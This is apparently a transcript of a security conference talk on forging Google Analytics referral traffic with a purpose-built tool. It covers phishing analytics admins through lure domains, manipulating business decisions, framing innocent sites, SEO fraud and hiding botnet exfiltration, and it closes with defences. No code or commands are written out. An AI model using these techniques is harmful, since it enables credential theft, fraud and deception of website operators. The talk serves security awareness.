 The next speaker is Tyler Rosonke. His theme is social engineering with web analytics. Just a little background on Tyler here. He's a security consultant and a penetration tester for Trust Foundry, a Midwest based security firm. He enjoys researching new technologies, studying them, understanding them, and identifying how an adversary could abuse it. So let's give him our attention, thanks. Hi everyone, thanks for sticking around. So my name's Tyler Rosonke. Like you said, I'm based out of Omaha, Nebraska. A little bit of me before I get going. I graduated from the University of Nebraska at Omaha with a degree in information assurance. From there I started with a fortune to under company and did some red teaming stuff. And then from there I'm now a security consultant slash penetration tester with Trust Foundry. I run a blog at zonkseck.com and when I'm not doing computer stuff, I like doing photography, videography, and doing other things. So a little disclaimer here, this information, this presentation's for information and educational purposes only. Me either I or my employers are responsible for any trouble you get yourself into with this stuff. So use at your own risk. So before we talk about social engineering with web analytics, we should talk about what web analytics is. A formal definition is the measurement, collection, analysis, and reporting of web data. What that really means is website operators use analytics on their website to track how users are getting there, what they're doing while they're there, maybe what browser they're in, all that sort of information, and then it gets aggregated and then they can paint pictures of what their users are doing. This is important because it helps website owners build better content, build better products, make decisions, and I'm sure you guys can think of reasons why that's useful. By far the top platform is Google Analytics. Although others exist, they're few and far between in my experience. So for the purpose of this talk, we're pretty much gonna be focusing on Google Analytics. So this all started a while ago. I run analytics on my blog and I started seeing strange referrals. I saw stuff like free traffic, social buttons, big money online, and all these other scammy sites. And clearly these sites don't actually, they're not actually referring traffic to my site. So I started thinking, well, what's going on? That doesn't seem legitimate. And being a penetration tester and red team kind of person has started getting me wondering how I could do this and how I could do this for evil. And so being the red team and penetration testing guy, I immediately start thinking of those applications, which to me, if I can get a link or a domain in front of somebody, I want them to go there and I'm gonna have an exploit waiting there or something. So it's like sort of like fishing with Google Analytics was the initial idea. And so I thought that idea out a little bit more and this is sort of the scenario. I would do open source intelligence gathering on the target, I would understand what the target does, what their business is, who their customers are. And then I would try and buy a domain that I think their analytics admin would go to. And an important distinction here is that the analytics admin, although that analytics was probably set up by a technology person, they probably handed it off to a business person or a marketing person to use that data. So we gotta keep that in mind that it's like a marketing business person. And then we also have to think about the context of what our link actually is and that it's gonna be showing up as referrals. So as if our site is sending traffic to the target site. So it has to make sense that whatever domain we pick and choose, it has to make sense that that would be sending traffic there. So for example, if our target was a retail company, maybe buying a domain that looked like a consumer review site would be a good one because it has reasons to be sending traffic to that retail company. And the business admin person would probably be interested in what that review site is saying about their site. And then there's some other examples there. So after we do that, we're gonna take that domain and point it to an attacker controlled site where maybe we have a browser exploit or a cross site request forgery vulnerability on the target site, or maybe just a credential harvest. And that is where you, so if the target site had some sort of login and then they go to my domain and it presents a login that looks like something that they're familiar and they log into it, you can steal their credentials. So after we have that all set up, we're gonna start spoofing referrals just like those scams did. And hopefully our link will show up in front of the admin, percolate its way up through the analytics portal, they click it, profit. So that idea made sense. After I kind of thought it out, I was like, okay, this seems possible. So how are those spammers doing it? And to understand that, I should probably figure out how analytics works. So from a high level, this is what it is. A user will go to a site wanting content, the server will respond with that content and then inside that content will be some JavaScript that's telling the browser, hey, collect some information about your user, collect some information about where they came from, maybe what links they're clicking and then send that off to our analytics server. And then that server collects all that information and ties it all together and then presents it to website operators so they can see what the users are doing. So that's like the high level. The low level is this. This is the exact JavaScript that Google Analytics gives you and tells you to put on all the pages you want to be tracked. The two important things to note here is first, this isn't the full script and that it's actually pulling in more and probably all of the juicy details are in there. And then secondly, that there's this string, the UA dash, something, something, something. And this is actually the tracking ID which is like the core component of how analytics works. This ID is the unique identifier. So all of Google Analytics, all those requests are going to a singular endpoint and so Google needs a way to say what data belongs to who and so this unique identifier is the way it does that. And so that becomes very important later on. So if we can look at that JavaScript and figure out the request it's making to that analytics server, we could probably start figuring out how it works and maybe do it ourselves. So I saw two paths for it. I can either reverse engineer the JavaScript or I can proxy the browser and like catch that request and try and understand what it's doing. So let's take a look at that big JavaScript it was pulling in and maybe see if we can figure it out. That doesn't look like much fun. So on second thought, let's not mess with the JavaScript and do something else. And that's when a third option sort of presented itself and that was that Google would just have amazing documentation about how it works. And here's a quick snapshot of all their required parameters. You probably can't read it, but it's not that important. So the reason you may be wondering why does Google provide this information? And I can't say for certain, but I have a pretty good assumption and that is because of the way it works the page has to be reloaded for that information to be sent that the JavaScript we showed only runs when the page is reloaded. And so the way the web is going we have these single page applications where the page loads once and then has lots of JavaScript to pull in data and redress the UI and the page never reloads that would break analytics. And so those sites would lose that granularity. So I assume that Google made all this information public so that these developers can get that granularity back and have that information. So with that documentation, we can open up Burp Suite or any other tool that can make requests. And we build out a request and you can see here that I made a request to it made it look like traffic was coming from a fake domain. And I sent the request off and the server responded with some stuff and I logged in my portal and sure enough it made it look like somebody was on my site from fake domain. And that's not true that no one was there. So effectively what's happening is this we're able to post directly to the analytic server and give it falsified information and those activities that we're saying happened never actually happened. So that sort of proved the idea of okay, we can get these links, like we can make it look like sites coming from, we can make it look like traffic's coming from sites that aren't actually sending traffic and we can set up those domains and that whole sort of scenario I talked about earlier is viable. And so that I went ahead and made some tools. I made the first version. I wrote a script called Google Analytics Attack and I got it added to the social engineering toolkit. And so if you have Cali Linux, it has the social engineering toolkit and you actually have this previous version of the tool. And this is the menu, how you get to it. And so when the script is running, the bread and butter of it is the automatic mode which you give it two links. You give it the link of the target site which is the site that you wanna fake a bunch of traffic to and then the referral site which is the site where you wanna make it look like lots of traffic is coming from. So that would be your juicy domain in your target site, your attacker site. And then the script will automatically make the request to the target site, grab that tracking ID, that unique identifier and some other metadata to make the request work, fire it off and there you go. You're starting to make it look like fake traffic showing up. And so something interesting that happened is there's the CID which stands for a client ID. Sorry, it's really small. But that's like a unique identifier for a user. And so if we don't randomize that parameter, if it's just a static thing, it looks like the same user is just going to the site over and over and over and that doesn't really make it look like lots of traffic. So you have to randomize that. That was something like I found later on. So I made that script and I actually blogged about it a little bit and I sort of had my reservations about it because it seemed kind of far out there and it wasn't doing anything crazy technical but I did it in any ways and it was fun and I enjoyed it. But then this article came out. And two things happened because of that. The first of which it validated me and I was like awesome, that's a thing. And the second thing it made me think is there's more here. I was so focused on doing red team and penetration testing applications that I failed to consider anything else. And so that made me wonder what else could happen and to sort of think about that, I had to understand how analytics is used because I use it in a very specific way but I'm sure there's other people that use it differently. So that means I need to go talk to other people who use this in the field, in the real world and understand that and that might bring some enlightenment. So that's exactly what I did. I met up with various contacts I have in various industries and talked about, hey, how do you guys use analytics and what do you think about this? And we had some discussions and some interesting ideas came out of it. But first, before we get into those scenarios, we came up with a common theme. I mean, if you're in here, you probably understand what social engineering is so I'm not gonna spend too much time on it and you probably know more than I do, I'm just like some pentester guy. But we know that humans love validation and reinforcement and that is a very strong persuasion. And so if we kind of think about that with the context of analytics, we can see something and that is analytics traffic is kind of like a validation and a reinforcement of a website. If you're getting views, if you're getting hits, there's people out there that think your site is good. So if that's to be true and we can control analytics, there might be some interesting things. It may mean that we can control any decisions that are made on analytics and it may mean we can manipulate any sort of measurements that are made with analytics. Any sort of measurements that are made with analytics being the measuring stick that could be potentially manipulated. So with that, I'll jump into some of the scenarios that I came up with. So the first one's sort of content control. Websites, they make content and if they have a particular type of content A and a particular type of content B and content B is getting lots of analytics traffic and seems really popular and content A is not so much, they're probably gonna make more of content B and if you could apply that sort of across the board, you can sort of maybe shift what kind of content is being made and therefore you can maybe reinforce and make certain political ideas, social ideas. You guys can, your imaginations are good too so you can think of different things that could happen but also the reverse is kind of possible. If we send traffic that looks to be coming from nefarious or antithetical sites, we could maybe discourage content. So if I write, if I have a website that's all about how cats are great and I see a bunch of referrals are coming to my site from a cat that says dogs are great, a site that says dogs are great to my cat site, that may sort of trigger some self-consciousness, maybe they're making fun of me or it may make me feel like a minority, like no one else cares about cats anymore and I might stop making that content. Then the nefarious is just sending traffic to these sites that comes from dark places of the web that are not so good and that might discourage someone as well. Another scenario that I came up with was e-commerce control. So if I'm running an e-commerce site and I have some products on the site and a particular product's receiving lots of traffic but no one's buying it, the main reason people don't buy stuff is because it's too expensive, I may think the price is too high and I make that product go on sale or maybe make the price drop. So that would be a form of interesting control as well. And e-commerce sites also, sometimes we'll talk about new features that are coming out for maybe their products. If they propose feature A and feature B, if we reinforce the idea that feature A is good, they will make feature A faster, better and maybe forget about that feature B. So there's some more control. Another scenario that was interesting was some web development espionage. So there's lots of web development companies and there's lots of clients that trust these web development companies to sort of handle their entire online presence and these companies are probably using analytics and share that with their customers because their customers need to make decisions with it. If there's a web development company who's a competitor, they may be interested in ruining that client relationship and they could potentially do it by bombarding the analytics with traffic and you would overflow it in such a way that you can no longer tell what's real and what's fake and that would sort of ruin their ability to have that insight and because the client is trusting their web development company, they may become disgruntled and we can't use this anymore, what happened and that may cause them to leave. Additionally, if the client is seeing lots of referrals from again, antithetical and nefarious sites, they may say, what the heck? Like why are we getting all of this referrals from gambling and pornography sites? Like that's not cool, we trusted you and we're gonna leave or if they have a particular sort of customer they're trying to reach and they're receiving lots of traffic from the opposite type of customer, the antithetical customer, again they may become disgruntled and leave. The next scenario is kind of out there so I'm gonna ask you to put on your tinfoil hats with me but if we can assume that a nation state was able to subpoena the analytics data and sort of have a mass data set, we could maybe assume that that nation state is using the analytics to identify suspicious websites and operators. Maybe they're looking for terrorist organizations or child pornography rings or any of that stuff. There are organizations that would be interesting in identifying and stopping these things. And so if they're using analytics to do that and we can control what analytics sees, if we can identify already known bad sites and refer traffic from those bad sites to innocent sites, we may kick off an investigation or maybe frame these innocent sites. Additionally the inverse is sort of possible where if we're bad guys and we have lots of bad guys coming to our site, if we can sort of murky the water there and send lots of good traffic, it may make it difficult to see what's actually going on and act like a cloak. The next scenario kind of goes back to the main thing that kicked all of this off which was sort of scammy online stuff. And to talk about this one, the first thing we have to mention is that SEO is actually not affected by analytics. SEO is search engine optimization. It's basically how techniques to increase your position on Google like to increase your rank in other search engines too. Analytics doesn't play any factor in that according to Google. They said Google has come out and said, hey, like not everyone's an analytics so it's not fair if we use that to decide how to do rank or get to keep that sort of out of the playing field. But people don't necessarily understand that. Additionally, analytics traffic isn't real. People don't understand that either. And so with those two fallacies at play, there are a lot of scams that are possible. Maybe I come to your company and I say, hi, I'm an SEO ninja and I can help your site get a lot more traffic and you should pay me. Or maybe I say, hey, don't pay me anything and if it happens, no risk. If it happens, you owe me this much per this increase. And then if we can control this analytics, we can make those things happen and then you get paid. If we could control geographical attributes of analytics so we can make it look like users are coming from specific spots, there's also some SEO things you can do there too. Maybe I come to your company and say, hey, I don't think you're doing very well on the east coast. I can get you more users from the east coast. You should pay me money. And again, that can happen. And then the oldest one is people buy traffic all the time. And so if they're using Google Analytics as their measuring stick to say if traffic is coming to their site or not, that could be manipulated. And so this stuff exists. Here's an example of people buying 25,000 hits on FIFER for five bucks. So not a lot of money, but it's out there. An interesting thing that came out of this is not only do the good guys use analytics, but bad guys use it too. Domainers and ad fraud networks and malware networks have been identified to be using analytics. Because just like the good guys, they need to know where their users, in this case victims, are coming from because that helps them choose where they go next and set up new systems. Which actually is interesting because it has become a form of attribution. If we have two known bad sites and they have the same tracking ID, we can assume that the same operators are behind both domains. So what could be done here is again, if we can just ruin the integrity of their analytics data, that might hurt their ability to operate. So with all this new stuff, the old tooling's just not good enough anymore. So I built a new tool, which this is the first time I've shown it to a crowd, so it's actually gonna be released today, called Google Analytics Attack NG. And to talk about what we did new with it, I need to talk about how the old one failed. And the biggest thing it did wrong was user emulation. So with the old tool, it looked like users showed up on the target site and then disappeared. They didn't click on anything, they didn't go anywhere else. And that made an incredibly high bounce rate, which if you know, any sort of stuff about the website, you know the bounce rate is, when someone comes to your site, if it's a bounce rate of 100%, that means people showed up on your site and then left and they didn't click around, which isn't a good thing, you wanna try and retain users. So because of that, it made the users look not legitimate. And so for these more sophisticated attacks, we needed to make the users look real. Because all of the requests to the analytics were previously coming from whatever IP the script was running on, that made it look like the same geographical location because Google uses the IP to decide where traffic's coming from. So it made it look like all the users are coming from one spot. Again, not a good way to make it look like real users. And with the sort of IP address stuff, if that's the attacker IP and that's sort of your attacker machine, that's bad operational security and that's a good way to get in trouble. So we need to make requests to Google analytics from a IP that's not ours. And what's even worse than making requests to analytics is we actually were making a request to the target site because we were trying to get that tracking ID. We left our IP address on the victim's machine, which is not good. And then the last thing that the previous version didn't do well is it failed to account for other perspectives. I was very focused on making pen testing and red teaming applications that I kind of failed to consider all of those other scenarios that I mentioned. So you may be wondering what's good user emulation and the best way to demonstrate that is to actually kind of peel back analytics the portal and show you what it looks like. So this is a screen cap from Google analytics and it shows where the users are going when they land on your site. And this is an example of bad user emulation because the users show up and they drop off. They don't click anywhere except the one on the bottom where the user clicked to one page. But overall, this demonstrates bad user emulation. What good user emulation looks like is they land on your page and then they click around. They go to other pages and they interact with the site. But that's sort of a slippery slope too because if all these users showed up and they went to like 10 pages, normal users don't do that. They don't click to 10 pages and then on average it's low. So there's kind of give and take there. The next view, the main columns we're interested in is the bounce rate and the pages per session and average session duration, which are all sort of between those three metrics you can decide what the users were doing. So the row that's most interesting, well there's a few we're gonna look at, but number four, which is github.com which is actual legitimate traffic that came to my blog. 86% of those users bounced away. That means they came to my site and they left. But a handful of them stuck around and when they did, on average they visited 1.3 pages and they were on average there for a minute and five seconds. That's pretty good users. The one right below, lolol.com, 100% of those users bounced, meaning they came to the site and they left. They visited that one page and they were there for zero seconds. So that's a bad user, that's spam. And an example of taking it sort of too far, like I mentioned before, if we look at row nine, githacktier.com, those users, the bounce rate was nine point, almost 10%, which that means lots of people click to other pages and on average they almost went to four pages per session and were there for 47 seconds. That's an example of kind of taking it too far. Users don't interact that much. So in this new version, we wanna have better user emulation, which because better user emulation involves waiting in real time to give the impairments of an actual user, we need to make the application threaded so that we can have better throughput. And we need to do geographical spoofing to protect not only the IP, but to make it seem like users are coming from more than one spot. We need to do some auto URLs, which we'll talk about in a little bit. And we need to have proxy support to use Tor and protect ourselves for better operational security. So to do better user emulation, I kind of broke down what that means and this is the way I organized what that means. So a session or one user interaction involves three types of URLs. The referral, which is where they're coming from, the target, what page they're landing on and the bounce to URL, which is where they go afterwards, what they bounce to and click to. And the attributes of a bounce is how many bounces they go to, how many pages they go beyond and how long they're on those pages when they do. And this will come into play later when I show you the tool. So the concept of auto URLs, in some of those scenarios we mentioned, it would be a good thing to be able to control specific referral URLs, specific target URLs, specific bounce URLs and maybe have not only one, but multiples of each. But so sometimes you want that granularity, but sometimes you don't, you just wanna, let's say I just wanna have a website receive lots of traffic and I don't really care where it's coming from, but I wanted to appear to be coming from a place of a certain topic. What if I did a Google search with a certain keyword that gave me lots of sites and it looked like those sites were referring traffic. So that's kind of the idea. So for example, if we did a Google search for good hacker blogs and we pointed that to my blog, that would generate a lot of traffic that would maybe reinforce my, if I'm running that blog, that people are interested in that I'm doing good work. And then we can apply that same sort of technique to grabbing target URLs and bounce URLs. So I have a quick demo to show some of the different stuff and I'm on the Khan Wi-Fi, so hopefully it stays strong. It could be messing with me. So I just kicked one off and we're gonna talk about the parameters and then we'll talk about a little bit of the output. So the script is in referral mode and we are gonna send traffic to zonkseq.com, which is my blog, and then we're gonna make it look like traffic is coming from defconniscancel.com and these users are going to bounce to two other pages while on my site and we're gonna add a delay there of about 60 seconds so they spend some time there. If all of the users were waiting exactly 60 seconds, that wouldn't be good because that would be a way to determine that the traffic's false. So I introduced the idea of jitter and if you've used tools, it's basically a way to insert some randomness into the delay. And so with the jitter being one, these users will either wait zero seconds or 60. If the jitter was 0.5, they would either wait or not either, but somewhere in between zero and 60. If the jitter was 0.5, they would be somewhere between 30 and 60 and so you can kind of control the randomness. And then this number N10 is saying we're gonna send 10 requests and then we're gonna do it over two threads. And so this has been running and the first output says geolist was not provided, we're gonna randomize requests from US cities. So the tool gives the ability to specify geographical locations. Google does this with what's called a criteria ID, which is used both in AdWords and in Google Analytics. This is just basically, this US city has this number, this state has this number and it's just a way of representing that stuff. And so because we didn't provide that, the script automatically just decides we're just gonna make it look like stuff is coming from all over the US. And it's all we didn't provide, a tracking ID so it went out and grabbed that for us and then we told it that we wanted to have two bounces so it's gonna bounce to other stuff on zonkseq.com but we didn't tell it what URLs to do. So it automatically did a Google search and grabbed other URLs on zonkseq.com to bounce to. And so you can see these sessions are starting to come back. The first one had, you can see this client ID and it had this geographical location ID and its behavior was, it looked like the user was referred from defconniscancel.com and then they landed on the home page where they sat around for 42 seconds and then clicked on to another page and were there for 24 seconds and then another page and dropped off. And you can see all of those delays are randomized as it's going. So if we hop over to analytics and take a look what's going on, we can see we have six users on our site, they're all coming from defconniscancel.com and the traffic is coming from all over the place. And so I'm sort of running low on time. There's other examples I was going to show that demonstrate other capabilities but there is more stuff here, that different flags that let you control all sorts of different stuff. So I'm going to jump back into the PowerPoint. Oh, and then I got to skip through all these screenshots because the demo gods did not fail me. So possible improvements, as you make these more granular attacks, there's a lot of command line arguments and it gets really tricky to follow. So taking in CSV configuration files would make it a lot easier. I love to be able to emulate social media referrals. Analytics does a lot of stuff with social media. So being able to control that would be interesting. And then currently the user agent that it appears, all the users are doing are the same. And so randomizing that would be nice. Some bonus content that I came across. Because you saw analytics was loading all of that data in real time. When you start sending lots and lots and lots of data, the browser gets really slow and can sometimes crash. So I thought that was interesting because that may be another potential scenario where you just don't even make analytics usable for them. And then another interesting thing that came out was if you're doing some sort of command and control for botnets, it'd be a really interesting idea for agents to send data out of networks by posting to analytics. But that's a different topic. So you may be wondering how can you prevent this from happening? The first one is user awareness. So teaching your analytics admins that this is possible and that they probably should be careful about clicking links while they're in analytics. You may have noticed that this whole thing sort of revolves around the tracking ID. And if we can get that, we can make it look like data's come into your site. So if there was a way to protect it, that'd be useful. The idea I came up with is you don't put that JavaScript on any of your pages and you have some script on the backend that's looking at server logs and then post analytics on those users' behalf so they never, their client's not doing it. And then that sort of fix things going forward but if you for some reason want to look backwards and see what data's real and what's not, you'd have to export all your analytics data and corroborate it with your server logs. In conclusion, analytics traffic is not real traffic. Therefore it can be spoofed and you should be really careful when clicking on things in analytics. And any decisions you make with analytics could potentially be manipulated and any sort of measurements with analytics as the measuring stick could be manipulated as well. I will be posting the code on GitHub and I'll probably have a user guide in these slides up on my blog in a future post. So thanks for listening and I'll be happy to answer any questions you may have.